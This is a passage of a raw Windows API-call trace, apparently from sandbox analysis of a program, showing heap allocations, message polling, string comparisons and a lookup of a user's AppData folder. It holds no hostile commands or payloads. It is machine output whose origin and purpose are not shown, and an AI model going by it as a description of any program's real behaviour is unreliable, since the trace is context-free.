lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0208.110] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0208.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0208.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0208.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0208.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0208.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0208.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0208.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0208.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0208.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0208.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0208.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0208.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0208.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0208.111] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Application Data", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.112] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pplication Data", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.112] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="plication Data", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.112] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lication Data", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.112] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ication Data", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.112] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cation Data", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.112] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ation Data", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.112] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tion Data", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.112] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ion Data", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.112] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="on Data", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.112] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n Data", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.112] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Data", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0208.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0208.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0208.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0208.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0208.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0208.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0208.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0208.113] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0208.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0208.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0208.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0208.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0208.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0208.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0208.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0208.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0208.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0208.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0208.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0208.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0208.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0208.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0208.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0208.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0208.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0208.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0208.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x22) returned 0x249f170 [0208.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0208.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Application Data", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pplication Data", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="plication Data", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lication Data", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ication Data", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cation Data", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ation Data", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tion Data", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.114] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ion Data", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="on Data", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n Data", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0208.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3a08 [0208.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0208.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a08 | out: hHeap=0x25c0000) returned 1 [0208.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0208.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0208.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0208.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0208.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0208.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0208.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0208.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0208.116] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0208.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0208.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0208.116] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0208.116] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0208.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0208.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa838 [0208.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0208.117] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0208.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0208.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa388 [0208.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0208.117] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0208.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0208.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0208.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0208.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0208.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0208.117] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0208.117] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.117] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0208.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0208.118] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0208.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0208.118] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0208.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0208.118] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0208.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0208.118] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Application Data", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x7256, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 0xaa5820 [0208.118] FindClose (in: hFindFile=0xaa5820 | out: hFindFile=0xaa5820) returned 1 [0208.119] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0208.119] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0208.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0208.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0208.119] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0208.119] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0208.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0208.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0208.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0208.119] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0208.119] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.119] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0208.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0208.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0208.120] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0208.120] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0208.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0208.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0208.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0208.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0208.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0208.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0208.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0208.123] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0208.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0208.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0208.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0208.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0208.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0208.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0208.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0208.123] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0208.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0208.123] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0208.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0208.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0208.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0208.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0208.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0208.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0208.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0208.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0208.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0208.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0208.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0208.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0208.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0208.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0208.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0208.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0208.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0208.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0208.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0208.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0208.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0208.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0208.124] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0208.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0208.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0208.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0208.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0208.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0208.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0208.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0208.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0208.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0208.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0208.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0208.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0208.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0208.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0208.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0208.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0208.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0208.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0208.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.126] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0208.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0208.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0208.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0208.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0208.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0208.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0208.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0208.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0208.126] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0208.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: 